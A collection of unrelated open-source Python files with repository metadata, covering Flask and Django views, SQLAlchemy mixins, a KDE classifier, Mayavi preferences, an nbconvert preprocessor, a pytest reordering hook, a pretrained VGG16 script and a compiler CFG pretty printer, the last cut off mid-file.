from flask import flash, current_app, Flask, render_template, request, redirect, url_for, Blueprint
from .forms import AdminUserForm, AdminRoleForm
from ..models import *
# This is the view that shows the admin dashboard.
admin = Blueprint('admin', __name__, url_prefix='/admin')
@admin.route('/index')
@admin.route('/dashboard')
def dashboard():
# Should show stats ( # New, # Updated, # Flagged For Deletion, Etc) for Users, Roles, Stores and Products, etc
return render_template('admin/dashboard.html', view_name='dashboard')
@admin.route('/users')
def users():
# Dashboard should show links to display data about all the tables in the database.
users = User.query.all()
return render_template('admin/users.html', view_name='users', users=users)
@admin.route('/user/', methods=['GET', 'POST'])
def add_user():
form = AdminUserForm()
return redirect(url_for('admin.users'))
return render_template('admin/edit_user.html', action='create', form=form)
@admin.route('/user/edit/<int:id>', methods=['GET', 'POST'])
def edit_user(id):
form = AdminUserForm()
return redirect(url_for('admin.users'))
return render_template('admin/edit_user.html', action='edit', form=form)
@admin.route('/role')
def roles():
roles = Role.query.all()
return render_template('admin/roles.html', view_name='roles', roles=roles)
@admin.route('/role')
def add_role():
return render_template('admin/roles.html', view_name='roles', roles=roles)
@admin.route('/role')
def edit_role(id):
return render_template('admin/roles.html', view_name='roles', roles=roles)
# Dashboard should include standard tools
# User administration
# User creation/deletion/permissions editing
#
# More stuff
# Much lower priority
| {
"repo_name": "jacobsky/shopping-aggregator",
"path": "shopping-aggregator/app/views/admin.py",
"copies": "1",
"size": "1726",
"license": "apache-2.0",
"hash": 1032525592355368600,
"line_mean": 31.5660377358,
"line_max": 112,
"alpha_frac": 0.7201622248,
"autogenerated": false,
"ratio": 3.2813688212927756,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.941442862204902,
"avg_score": 0.01742048480875109,
"num_lines": 53
} |
"""App views."""
from __future__ import unicode_literals
from django.shortcuts import render, redirect
from django.http import HttpResponse
from game_app.models import GameModel
from game_app.clean_files import config_section_map, change_settings
from game_app.forms import GameForm, UploadForm
def home_view(request):
"""Home view."""
if request.method == 'POST':
form = GameForm(request.POST)
return redirect('/generateform/{}'.format(form.data['games']))
else:
form = GameForm()
upload_form = UploadForm()
return render(request, 'home.html', context={'form': form, 'upload_form': upload_form})
def upload_view(request):
"""Upload file."""
upload_form = UploadForm(request.POST, request.FILES)
instance = upload_form.save()
return redirect('/generateform/{}'.format(instance.id))
def generate_form(request, **kwargs):
"""Generate form based on game file settings."""
file_id = kwargs.get('file_id')
file = GameModel.objects.filter(id=file_id).first()
parsed_file, section = config_section_map(file.ini_file.file)
if request.method == 'GET':
return render(request, 'home.html', context={'parsed_file': parsed_file})
form_data = request.POST
copy = file.ini_file.file
temp = change_settings(section, form_data, copy)
temp.seek(0)
response = HttpResponse(temp, content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename={}.ini'.format(file.title)
temp.close()
return response
| {
"repo_name": "flegald/Gameini",
"path": "gameini/game_app/views.py",
"copies": "1",
"size": "1534",
"license": "mpl-2.0",
"hash": 286430785679483620,
"line_mean": 34.6744186047,
"line_max": 95,
"alpha_frac": 0.6799217731,
"autogenerated": false,
"ratio": 3.797029702970297,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.985670658752478,
"avg_score": 0.024048977709103473,
"num_lines": 43
} |
# app.views.py
#
# Views for dynamic content
import logging, urllib
from django.shortcuts import render
from yacon.models.pages import Page, PageType, Block
logger = logging.getLogger(__name__)
# ============================================================================
NEWS_PAGE_TYPE = None
# ============================================================================
# Dynamic Views
# ============================================================================
def news_listing(request, data):
global NEWS_PAGE_TYPE
search = request.GET.get('q')
if search:
search = urllib.unquote(search)
blocks = Block.search(search, block_key='news', highlighted=True)
data.update({
'search':True,
'search_terms':search,
'blocks':blocks,
})
else:
# find all of the blogs in the system and list them
if not NEWS_PAGE_TYPE:
NEWS_PAGE_TYPE = PageType.objects.get(name='News Type')
# return all possible news items
news_items = Page.find_by_page_type(NEWS_PAGE_TYPE).order_by('-created')
# return enitre listing, summarization will be done by template tag on
# the page
data.update({
'news_items':news_items,
})
return render(request, 'news_listing.html', data)
| {
"repo_name": "cltrudeau/django-yacon",
"path": "extras/sample_site/app/views.py",
"copies": "1",
"size": "1338",
"license": "mit",
"hash": -5604780758358374000,
"line_mean": 28.7333333333,
"line_max": 80,
"alpha_frac": 0.5119581465,
"autogenerated": false,
"ratio": 4.316129032258065,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.004738782698691633,
"num_lines": 45
} |
"""App-wide DB definitions
"""
# Ben Peters (bencpeters@gmail.com)
import json
from datetime import datetime
from sqlalchemy.types import TypeDecorator, VARCHAR
from sqlalchemy.orm import sessionmaker, scoped_session, relationship
from sqlalchemy.ext.declarative import declarative_base, declared_attr
from sqlalchemy import (
ForeignKey, Column, DateTime, Integer, Float, Unicode
)
from sqlalchemy.sql.expression import func
from home_controller.log import logger
class Base(object):
"""Mixin to augment the declarative base with logging & other common model
functionality
"""
@property
def log(self):
return logger
Base = declarative_base(cls=Base)
class Timestamps(object):
"""Mixin for adding TimeStamp columns to a model
"""
created_at = Column(DateTime, default=func.now())
updated_at = Column(DateTime, default=func.now())
class UniqueId(object):
"""Mixin for adding a unique id column to a model
"""
id = Column(Integer, primary_key=True, nullable=False)
class JSONEncodedDict(TypeDecorator):
"""Represents an immutable structure as a json-encoded string.
Recipe from
http://docs.sqlalchemy.org/en/rel_0_9/core/custom_types.html#marshal-json-strings
Usage::
JSONEncodedDict(255)
"""
impl = VARCHAR
def process_bind_param(self, value, dialect):
if value is not None:
value = json.dumps(value)
return value
def process_result_value(self, value, dialect):
if value is not None:
value = json.loads(value)
return value
session_factory = sessionmaker()
Session = scoped_session(session_factory)
class BaseType(object):
"""Mixin for a class that is intended to be the base class for a wide
variety of inherited types.
"""
@declared_attr
def type_(cls):
return Column(Integer, nullable=False)
attributes = Column(JSONEncodedDict)
__mapper_args__ = {
"polymorphic_on": type_
}
@property
def type_string(self):
"""Accessor for the string type name
"""
if getattr(self, "types", None) is not None:
return self.types(self.type).name
class _DataCollection(UniqueId):
"""Base class that gets used for dynamically created classes in
HasFloatDataCollection mixin. This is the collection of values that is
linked with the parent class.
"""
timestamp = Column(DateTime)
def __init__(self, parent, values):
try:
len(values)
self.values = values
except:
self.values = [values]
self.parent = parent
class _DataCollectionValues(UniqueId):
"""Base class that gets used for dynamically created classes in
HasFloatDataCollection mixin. This is the actual value holder that is
linked with the records collection.
"""
value = Column(Float)
name = Column(Unicode(20), nullable=False)
def __init__(self, value, name, record=None):
self.value = value
self.name = name
self.record = record
class HasFloatDataCollection(object):
"""Mixin to add data collection tables & relationships.
"""
@declared_attr
def data(cls):
make_cls_name = lambda n: "".join(
[s.capitalize() for s in cls.data_table_name.split("_")]) + n
collection = type(make_cls_name("Collection"),
(_DataCollection, Base), {
"__tablename__": cls.data_table_name,
"values": relationship(make_cls_name("CollectionValues"),
backref="record"),
"parent_id": Column(Integer,
ForeignKey("{}.id".format(cls.__tablename__)),
nullable=False),
})
values = type(make_cls_name("CollectionValues"),
(_DataCollectionValues, Base), {
"__tablename__": cls.data_table_name + "_values",
"record_id": Column(Integer,
ForeignKey("{}.id".format(cls.data_table_name)),
nullable=False),
})
cls.record_type = collection
cls.value_type = values
return relationship(collection, backref="parent")
def _update_data(self, data):
"""Helper function to update the DB with new data values
Create our own session so that we're threadsafe
"""
session = Session()
session.add(self.record_type(self, data))
try:
self.last_update = datetime.utcnow()
except AttributeError:
pass
session.commit()
self._latest_data = data
try:
self.log.debug("Updated data for {cls_name} {name}".format(
cls_name=self.__class__.__name__,
name=self.name,
))
except AttributeError:
pass
| {
"repo_name": "bencpeters/home-controls",
"path": "home_controller/db.py",
"copies": "1",
"size": "4910",
"license": "mit",
"hash": -8556316691214224000,
"line_mean": 28.4011976048,
"line_max": 85,
"alpha_frac": 0.6099796334,
"autogenerated": false,
"ratio": 4.383928571428571,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5493908204828571,
"avg_score": null,
"num_lines": null
} |
"""A predictor that uses KDE to classify instances."""
import numpy
import sklearn.base
import sklearn.neighbors
import sklearn.utils.multiclass
import sklearn.utils.validation
class KDEClassifier(sklearn.base.BaseEstimator, sklearn.base.ClassifierMixin):
"""A classifier using kernel density estimation to classify instances."""
def __init__(self, bandwidth=1.0):
"""A classifier using kernel density estimation to classify instances.
A kernel density estimate is fit to each class. These estimates are used
to score instances and the highest score class is used as the label for
each instance.
bandwidth : float
Bandwidth for the kernel density estimate.
"""
self.bandwidth = bandwidth
def fit(self, X, y):
"""Fits kernel density models to the data.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
y : array-like, shape (n_samples,)
Target vector relative to X.
"""
X, y = sklearn.utils.validation.check_X_y(X, y)
self.classes_ = sklearn.utils.multiclass.unique_labels(y)
self.kdes_ = [
sklearn.neighbors.KernelDensity(self.bandwidth).fit(X[y == label])
for label in self.classes_]
return self
def predict(self, X):
"""Predicts class labels.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
"""
sklearn.utils.validation.check_is_fitted(self, ['kdes_', 'classes_'])
X = sklearn.utils.validation.check_array(X)
scores = self.predict_proba(X)
most_probable_indices = scores.argmax(axis=1)
assert most_probable_indices.shape[0] == X.shape[0]
return numpy.array([self.classes_[i] for i in most_probable_indices])
@staticmethod
def _softmax(data, axis=0):
"""Computes the softmax of an array along an axis.
Notes
-----
Adapted from https://gist.github.com/stober/1946926.
Parameters
----------
data : array_like
Array of numbers.
axis : int
Axis to softmax along.
"""
e_x = numpy.exp(
data - numpy.expand_dims(numpy.max(data, axis=axis), axis))
out = e_x / numpy.expand_dims(e_x.sum(axis=axis), axis)
return out
def predict_proba(self, X):
"""Predicts class probabilities.
Class probabilities are normalised log densities of the kernel density
estimates.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
"""
sklearn.utils.validation.check_is_fitted(self, ['kdes_', 'classes_'])
X = sklearn.utils.validation.check_array(X)
scores = numpy.zeros((X.shape[0], len(self.classes_)))
for label, kde in enumerate(self.kdes_):
scores[:, label] = kde.score_samples(X)
scores = self._softmax(scores, axis=1)
assert scores.shape == (X.shape[0], len(self.classes_))
assert numpy.allclose(scores.sum(axis=1), numpy.ones((X.shape[0],)))
return scores
| {
"repo_name": "chengsoonong/acton",
"path": "acton/kde_predictor.py",
"copies": "1",
"size": "3519",
"license": "bsd-3-clause",
"hash": 3447067531607300600,
"line_mean": 31.2844036697,
"line_max": 80,
"alpha_frac": 0.6027280477,
"autogenerated": false,
"ratio": 4.174377224199288,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5277105271899288,
"avg_score": null,
"num_lines": null
} |
"""A preference manager for all mayavi related preferences.
The idea behind this module is that it lets the mayavi
library/application use the same preferences by managing them no matter
if mayavi is used as an application (via envisage3) or as a library.
The preferences helpers are divided into different categories for
different kinds of preferences. Currently the following are available.
- root: for global mayavi preferences of the form
'mayavi.preference'.
For more details on the general preferences support in enthought, please
read the documentation for apptools.preferences (part of the AppTools
package).
"""
# Author: Prabhu Ramachandran <prabhu [at] aero . iitb . ac . in>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
# Standard library imports
from os.path import join
import pkg_resources
# Enthought library imports.
from traits.etsconfig.api import ETSConfig
from traits.api import HasTraits, Instance
from traitsui.api import View, Group, Item
from apptools.preferences.api import (ScopedPreferences, IPreferences,
PreferencesHelper)
# Local imports.
from mayavi.preferences.preferences_helpers import (
RootPreferencesHelper, MlabPreferencesHelper )
# The application ID where the preferences are stored.
ID = 'mayavi_e3'
################################################################################
# `PreferenceManager` class
################################################################################
class PreferenceManager(HasTraits):
# The root preferences helper for preferences of the form
# 'mayavi.preference'.
root = Instance(PreferencesHelper)
# The mlab preferences helper for preferences of the form
# 'mayavi.mlab.preference'.
mlab = Instance(PreferencesHelper)
# The preferences.
preferences = Instance(IPreferences)
######################################################################
# Traits UI view.
traits_view = View(Group(
Group(Item(name='root', style='custom'),
show_labels=False, label='Root',
show_border=True
),
Group(Item(name='mlab', style='custom'),
show_labels=False, label='Mlab',
show_border=True,
),
),
buttons=['OK', 'Cancel'],
resizable=True
)
######################################################################
# `HasTraits` interface.
######################################################################
def __init__(self, **traits):
super(PreferenceManager, self).__init__(**traits)
if 'preferences' not in traits:
self._load_preferences()
def _preferences_default(self):
"""Trait initializer."""
return ScopedPreferences()
def _root_default(self):
"""Trait initializer."""
return RootPreferencesHelper(preferences=self.preferences)
def _mlab_default(self):
"""Trait initializer."""
return MlabPreferencesHelper(preferences=self.preferences)
######################################################################
# Private interface.
######################################################################
def _load_preferences(self):
"""Load the default preferences."""
# Save current application_home.
app_home = ETSConfig.get_application_home()
# Set it to where the mayavi preferences are temporarily.
path = join(ETSConfig.get_application_data(), ID)
ETSConfig.application_home = path
try:
for pkg in ('mayavi.preferences',
'tvtk.plugins.scene'):
pref = 'preferences.ini'
pref_file = pkg_resources.resource_stream(pkg, pref)
preferences = self.preferences
default = preferences.node('default/')
default.load(pref_file)
pref_file.close()
finally:
# Set back the application home.
ETSConfig.application_home = app_home
def _preferences_changed(self, preferences):
"""Setup the helpers if the preferences trait changes."""
for helper in (self.root, ):
helper.preferences = preferences
##########################################################
# A Global preference manager that all other modules can use.
preference_manager = PreferenceManager()
| {
"repo_name": "alexandreleroux/mayavi",
"path": "mayavi/preferences/preference_manager.py",
"copies": "5",
"size": "4651",
"license": "bsd-3-clause",
"hash": -4791921345028933000,
"line_mean": 35.0542635659,
"line_max": 80,
"alpha_frac": 0.5452590841,
"autogenerated": false,
"ratio": 5.156319290465632,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.009137362302736981,
"num_lines": 129
} |
"""A preprocessor that extracts all of the outputs from the
notebook file. The extracted outputs are returned in the 'resources' dictionary.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from binascii import a2b_base64
import sys
import os
from mimetypes import guess_extension
from traitlets import Unicode, Set
from .base import Preprocessor
def guess_extension_without_jpe(mimetype):
"""
This function fixes a problem with '.jpe' extensions
of jpeg images which are then not recognised by latex.
For any other case, the function works in the same way
as mimetypes.guess_extension
"""
ext = guess_extension(mimetype)
if ext==".jpe":
ext=".jpeg"
return ext
class ExtractOutputPreprocessor(Preprocessor):
"""
Extracts all of the outputs from the notebook file. The extracted
outputs are returned in the 'resources' dictionary.
"""
output_filename_template = Unicode(
"{unique_key}_{cell_index}_{index}{extension}"
).tag(config=True)
extract_output_types = Set(
{'image/png', 'image/jpeg', 'image/svg+xml', 'application/pdf'}
).tag(config=True)
def preprocess_cell(self, cell, resources, cell_index):
"""
Apply a transformation on each cell,
Parameters
----------
cell : NotebookNode cell
Notebook cell being processed
resources : dictionary
Additional resources used in the conversion process. Allows
preprocessors to pass variables into the Jinja engine.
cell_index : int
Index of the cell being processed (see base.py)
"""
#Get the unique key from the resource dict if it exists. If it does not
#exist, use 'output' as the default. Also, get files directory if it
#has been specified
unique_key = resources.get('unique_key', 'output')
output_files_dir = resources.get('output_files_dir', None)
#Make sure outputs key exists
if not isinstance(resources['outputs'], dict):
resources['outputs'] = {}
#Loop through all of the outputs in the cell
for index, out in enumerate(cell.get('outputs', [])):
if out.output_type not in {'display_data', 'execute_result'}:
continue
#Get the output in data formats that the template needs extracted
for mime_type in self.extract_output_types:
if mime_type in out.data:
data = out.data[mime_type]
#Binary files are base64-encoded, SVG is already XML
if mime_type in {'image/png', 'image/jpeg', 'application/pdf'}:
# data is b64-encoded as text (str, unicode),
# we want the original bytes
data = a2b_base64(data)
elif sys.platform == 'win32':
data = data.replace('\n', '\r\n').encode("UTF-8")
else:
data = data.encode("UTF-8")
ext = guess_extension_without_jpe(mime_type)
if ext is None:
ext = '.' + mime_type.rsplit('/')[-1]
filename = self.output_filename_template.format(
unique_key=unique_key,
cell_index=cell_index,
index=index,
extension=ext)
# On the cell, make the figure available via
# cell.outputs[i].metadata.filenames['mime/type']
# where
# cell.outputs[i].data['mime/type'] contains the data
if output_files_dir is not None:
filename = os.path.join(output_files_dir, filename)
out.metadata.setdefault('filenames', {})
out.metadata['filenames'][mime_type] = filename
#In the resources, make the figure available via
# resources['outputs']['filename'] = data
resources['outputs'][filename] = data
return cell, resources
| {
"repo_name": "ammarkhann/FinalSeniorCode",
"path": "lib/python2.7/site-packages/nbconvert/preprocessors/extractoutput.py",
"copies": "8",
"size": "4365",
"license": "mit",
"hash": 2131991370487359700,
"line_mean": 39.0458715596,
"line_max": 83,
"alpha_frac": 0.5541809851,
"autogenerated": false,
"ratio": 4.786184210526316,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9340365195626316,
"avg_score": null,
"num_lines": null
} |
"""A pre-specified hook to reorder test functions and its building blocks."""
import re
# Default regular expressions match varying paths - for example the unit tests re matches:
# tests/unit/...
# test_unit.py
# app/tests/unit/....
# tests/test_unit
# unit
# But won't match (e.g.):
# some_unit
# abc_test_unit
DEFAULT_ORDER = (
r'(^|.*/)(test_)?unit',
None, # None - no match.
r'(^|.*/)(test_)?integration',
r'(^|.*/)(test_)?ui',
)
class PytestReorderError(Exception):
"""Raised when trying to make a reorder hook with wrong arguments."""
class EmptyTestsOrderList(PytestReorderError):
"""Raised when the passed list defining tests order is empty."""
class UndefinedUnmatchedTestsOrder(PytestReorderError):
"""Raised when the list defining tests order does not specify the order for unmatched tests."""
def unpack_test_ordering(ordering):
"""
Build a list of compiled regexes and the order of tests they match; get unmatched tests order.
>>> unpack_test_ordering(['a.*', 'b.*', None, 'k.*'])
([(re.compile(r'a.*'), 0), (re.compile(r'b.*'), 1), (re.compile(r'k.*'), 3)], 2)
:param list ordering: a list of re strings matching test nodeids in desired order,
One None is required in the list to specify the position of tests not matching any
of the regexes.
:raise EmptyTestsOrderList: if the ``ordering`` list is empty
:raise UndefinedUnmatchedTestsOrder: if ``ordering`` does not specify the order of unmatched
tests
:rtype: tuple
:return: 2-tuple of a list of tuples of compiled regexes and positions of the tests that match
them and an int of the position of the tests that don't match any of the regular
expressions.
"""
if len(ordering) == 0:
raise EmptyTestsOrderList('The ordering list is empty.')
re_to_order = [(re.compile(regex), index) for index, regex in enumerate(ordering)
if regex is not None]
try:
unmatched_order = ordering.index(None)
except ValueError:
raise UndefinedUnmatchedTestsOrder(
'The list does not specify the order of unmatched tests.')
return re_to_order, unmatched_order
def make_reordering_hook(ordered_re_strings_matching_tests):
"""
Given a list of ordered regexps matching tests, return a hook to arrange tests in that order.
The tests will be sorted depending on which regular expressions they match.
This list should contain one None for unmatched tests.
:param list ordered_re_strings_matching_tests: a list of regular expression strings that match
nodeids of tests (sample nodeid: 'tests/ui/test_some_ui.py::test_something_ui') and one None
to specify the order of tests that don't match any of the regular expressions.
E.g.: ``[r'*.unit', None, r'.*integration']`` - will make the hook place unit tests first,
then unmatched tests, and integration tests at the end.
:raise EmptyTestsOrderList: if the ``ordered_re_strings_matching_tests`` list is empty
:raise UndefinedUnmatchedTestsOrder: if ``ordered_re_strings_matching_tests`` does not contain
one None, thus does not define the order of unmatched tests
:rtype: function
:return: a valid ``pytest_collection_modifyitems`` hook to reorder collected tests
"""
re_to_order, unmatched_order = unpack_test_ordering(ordered_re_strings_matching_tests)
def pytest_collection_modifyitems(session, config, items):
"""Reorder tests according to the list %r.""" % (ordered_re_strings_matching_tests,)
def sort_key(item):
"""
Get the sort key for tests reordering.
All items matching the same regular expression will get the same key. This is OK since
`list.sort`` is stable.
:rtype: int
:return sort key dependent on the matched regex; integer starting from zero
"""
for regex, order in re_to_order:
if regex.match(item.nodeid):
return order
return unmatched_order
items.sort(key=sort_key)
return pytest_collection_modifyitems
default_reordering_hook = make_reordering_hook(DEFAULT_ORDER)
| {
"repo_name": "not-raspberry/pytest_reorder",
"path": "pytest_reorder/reorder.py",
"copies": "1",
"size": "4241",
"license": "mit",
"hash": -9166820939986367000,
"line_mean": 38.2685185185,
"line_max": 100,
"alpha_frac": 0.6722471115,
"autogenerated": false,
"ratio": 4.04675572519084,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.521900283669084,
"avg_score": null,
"num_lines": null
} |
"""A pre-trained implimentation of VGG16 with weights trained on ImageNet.
NOTE: It's not a great idea to use tf.constant to take in large arrays that will
not change, better to use a non-trainable variable.
https://stackoverflow.com/questions/41150741/in-tensorflow-what-is-the-difference-between-a-constant-and-a-non-trainable-var?rq=1
"""
##########################################################################
# Special thanks to
# http://www.cs.toronto.edu/~frossard/post/vgg16/
# for converting the caffe VGG16 pre-trained weights to TensorFlow
# this file is essentially just a restylized version of his vgg16.py
##########################################################################
from __future__ import print_function, absolute_import, division
import os
import numpy as np
from scipy.misc import imread, imresize
import tensorflow as tf
_debug = False
def pretrained_conv_layer(name, input_tensor, params):
r"""Creates a convolutional layer with
Args:
name: A `str`, the name for the operation defined by this function.
input_tensor: A `Tensor`.
diameter: An `int`, the width and also height of the filter.
in_dim: An `int`, the number of input channels.
out_dim: An `int`, the number of output channels.
"""
with tf.name_scope(name):
weights = tf.constant(params[name+'_W'])
biases = tf.constant(params[name+'_b'])
conv = tf.nn.conv2d(input=input_tensor,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME',
name='convolution')
preactivations = tf.nn.bias_add(conv, biases, name='bias_addition')
activations = tf.nn.relu(preactivations, name='activation')
return activations
def pretrained_fc_layer(name, in_tensor, params, sigmoid=tf.nn.relu):
with tf.name_scope(name):
weights = tf.constant(params[name+'_W'])
biases = tf.constant(params[name+'_b'])
preactivations = tf.nn.bias_add(tf.matmul(in_tensor, weights), biases)
activations = sigmoid(preactivations, name='activation')
return activations
class PreTrainedVGG16:
def __init__(self, weights=None, session=None):
if weights is not None and session is not None:
self.parameters = np.load(weights)
self.input_images = tf.placeholder(tf.float32, (None, 224, 224, 3))
self.activations = self._build_graph()
self.output = self.activations['fc8']
@staticmethod
def get_class_names():
with open('ImageNet_Classes.txt') as names_file:
return [l.replace('\n', '') for l in names_file]
def get_output(self, images, auto_resize=True):
""""Takes in a list of images and returns softmax probabilities."""
if auto_resize:
images_ = [imresize(im, (224, 224)) for im in images]
else:
images_ = images
feed_dict = {self.input_images: images_}
return sess.run(vgg.output, feed_dict)[0]
def get_activations(self, images, auto_resize=True):
""""Takes in a list of images and returns the activation dictionary."""
if auto_resize:
images_ = [imresize(im, (224, 224)) for im in images]
else:
images_ = images
feed_dict = {self.input_images: images_}
return sess.run(vgg.activations, feed_dict)[0]
def _build_graph(self):
parameters = [] # storage for trainable parameters
# pooling arguments
_ksize = [1, 2, 2, 1]
_strides = [1, 2, 2, 1]
# center the input images
with tf.name_scope('preprocess_centering'):
mean = tf.constant([123.68, 116.779, 103.939], dtype=tf.float32,
shape=[1, 1, 1, 3], name='img_mean')
c_images = self.input_images - mean
# images --> conv1_1 --> conv1_2 --> pool1
conv1_1 = pretrained_conv_layer('conv1_1', c_images, self.parameters)
conv1_2 = pretrained_conv_layer('conv1_2', conv1_1, self.parameters)
pool1 = tf.nn.max_pool(conv1_2, _ksize, _strides, 'SAME', name='pool1')
# pool1 --> conv2_1 --> conv2_2 --> pool2
conv2_1 = pretrained_conv_layer('conv2_1', pool1, self.parameters)
conv2_2 = pretrained_conv_layer('conv2_2', conv2_1, self.parameters)
pool2 = tf.nn.max_pool(conv2_2, _ksize, _strides, 'SAME', name='pool2')
# pool2 --> conv3_1 --> conv3_2 --> conv3_3 --> pool3
conv3_1 = pretrained_conv_layer('conv3_1', pool2, self.parameters)
conv3_2 = pretrained_conv_layer('conv3_2', conv3_1, self.parameters)
conv3_3 = pretrained_conv_layer('conv3_3', conv3_2, self.parameters)
pool3 = tf.nn.max_pool(conv3_3, _ksize, _strides, 'SAME', name='pool3')
# pool3 --> conv4_1 --> conv4_2 --> conv4_3 --> pool4
conv4_1 = pretrained_conv_layer('conv4_1', pool3, self.parameters)
conv4_2 = pretrained_conv_layer('conv4_2', conv4_1, self.parameters)
conv4_3 = pretrained_conv_layer('conv4_3', conv4_2, self.parameters)
pool4 = tf.nn.max_pool(conv4_3, _ksize, _strides, 'SAME', name='pool4')
# pool4 --> conv5_1 --> conv5_2 --> conv5_3 --> pool5
conv5_1 = pretrained_conv_layer('conv5_1', pool4, self.parameters)
conv5_2 = pretrained_conv_layer('conv5_2', conv5_1, self.parameters)
conv5_3 = pretrained_conv_layer('conv5_3', conv5_2, self.parameters)
pool5 = tf.nn.max_pool(conv5_3, _ksize, _strides, 'SAME', name='pool5')
# pool5 --> flatten --> fc1 --> fc2 --> fc3
shape = int(np.prod(pool5.get_shape()[1:]))
pool5_flat = tf.reshape(pool5, [-1, shape])
fc1 = pretrained_fc_layer('fc6', pool5_flat, self.parameters)
fc2 = pretrained_fc_layer('fc7', fc1, self.parameters)
fc3 = pretrained_fc_layer('fc8', fc2, self.parameters, tf.nn.softmax)
activations = {
'conv1_1': conv1_1, 'conv1_2': conv1_2, 'pool1': pool1,
'conv2_1': conv2_1, 'conv2_2': conv2_2, 'pool2': pool2,
'conv3_1': conv3_1, 'conv3_2': conv3_2, 'conv3_3': conv3_3, 'pool3': pool3,
'conv4_1': conv4_1, 'conv4_2': conv4_2, 'conv4_3': conv4_3, 'pool4': pool4,
'conv5_1': conv5_1, 'conv5_2': conv5_2, 'conv5_3': conv5_3, 'pool5': pool5,
'fc6': fc1, 'fc7': fc2, 'fc8': fc3
}
return activations
if __name__ == '__main__':
# Get input
input_images = [imread('testflash.jpg', mode='RGB')]
# Check 'vgg16_weights.npz exists
if not os.path.isfile('vgg16_weights.npz'):
raise Exception(
"The weights I use here were converted from the Caffe Model Zoo "
"weights by Davi Frossard. He didn't include a license so I'm "
"hesistant to re-post them. Please download them from his "
"website:\nhttp://www.cs.toronto.edu/~frossard/post/vgg16/")
# Build VGG16
if _debug:
sess = tf.InteractiveSession()
else:
sess = tf.Session()
vgg = PreTrainedVGG16('vgg16_weights.npz', sess)
# Run images through network, return softmax probabilities
from time import time
a = time()
class_probabilities = vgg.get_output(input_images)
print(time()-a)
# Get Class Names
class_names = vgg.get_class_names()
# Report results
top5 = (np.argsort(class_probabilities)[::-1])[0:10]
with open('results.txt', 'w') as f:
for p in np.argsort(class_probabilities)[::-1]:
f.write(str(class_probabilities[p]) + ' : ' + class_names[p] + '\n')
for p in top5:
print(class_probabilities[p], ' : ', class_names[p])
| {
"repo_name": "mathandy/Classifiers2LearnWith",
"path": "experiments/vgg16_pre-trained/vgg16_pre-trained-alt.py",
"copies": "1",
"size": "7715",
"license": "mit",
"hash": -1447211170855051800,
"line_mean": 40.7027027027,
"line_max": 129,
"alpha_frac": 0.5935191186,
"autogenerated": false,
"ratio": 3.360191637630662,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9451678980291782,
"avg_score": 0.0004063551877759528,
"num_lines": 185
} |
'''A pretty printer for Runa CFG nodes.
This module implements another CFG walker, which spits out a string
represenation of the given CFG object. This is intended as a debugging aid
during compiler development, and can be invoked using the compiler driver's
`show` command (parametrized with the last pass to run before printing.
'''
from . import types, util
class PrettyPrinter(object):
def __init__(self):
self.buf = []
def newline(self):
self.buf.append('\n')
def write(self, data):
assert isinstance(data, str), data
self.buf.append(data)
def writeline(self, ln):
if not ln: return
self.write(ln + '\n')
def visit(self, node):
if isinstance(node, types.base):
self.type(node)
else:
getattr(self, node.__class__.__name__)(node)
def build(self, name, fun):
name = '.'.join(name) if isinstance(name, tuple) else name
self.start = False
self.write('def %s(' % name)
for i, node in enumerate(fun.args):
self.visit(node)
if i < len(fun.args) - 1:
self.write(', ')
self.write(')')
if fun.rtype is not None:
self.write(' -> ')
self.type(fun.rtype)
self.write(':')
self.newline()
for i, bl in sorted(util.items(fun.flow.blocks)):
self.writeline(' %2i: # %s' % (i, bl.anno))
for sid, step in enumerate(bl.steps):
self.write(' {%02i} ' % sid)
self.visit(step)
self.newline()
return ''.join(self.buf)
def type(self, node):
self.write(node.name)
def anno(self, node):
if node.type is None and not getattr(node, 'escapes', False):
return
if isinstance(node.type, (types.function, types.Type)):
return
self.write(' [')
if node.type is not None:
self.visit(node.type)
if node.type is not None and getattr(node, 'escapes', False):
self.write(':')
if getattr(node, 'escapes', False):
self.write('E')
self.write(']')
def NoneVal(self, node):
self.write('NoneVal')
self.anno(node)
def Name(self, node):
self.write(node.name)
self.anno(node)
def Bool(self, node):
self.write(str(node.val))
self.anno(node)
def Int(self, node):
self.write(str(node.val))
self.anno(node)
def Float(self, node):
self.write(str(node.val))
self.anno(node)
def String(self, node):
self.write(repr(node.val))
self.anno(node)
def Tuple(self, node):
self.write('(')
for i, n in enumerate(node.values):
if i:
self.write(', ')
self.visit(n)
self.write(')')
def binary(self, op, node):
self.write(op + ' ')
self.visit(node.left)
self.write(' ')
self.visit(node.right)
def As(self, node):
self.write('As ')
self.visit(node.left)
self.write(' ')
self.visit(node.type)
def Not(self, node):
self.write('Not ')
self.visit(node.value)
def And(self, node):
self.binary('And', node)
def Or(self, node):
self.binary('Or', node)
def Is(self, node):
self.binary('Is', node)
def NE(self, node):
self.binary('NE', node)
def GT(self, node):
self.binary('GT', node)
def LT(self, node):
self.binary('LT', node)
def EQ(self, node):
self.binary('EQ', node)
def Add(self, node):
self.binary('Add', node)
def Sub(self, node):
self.binary('Sub', node)
def Mod(self, node):
self.binary('Mod', node)
def Mul(self, node):
self.binary('Mul', node)
def Div(self, node):
self.binary('Div', node)
def BWAnd(self, node):
self.binary('BWAnd', node)
def BWOr(self, node):
self.binary('BWOr', node)
def BWXor(self, node):
self.binary('BWXor', node)
def IAdd(self, node):
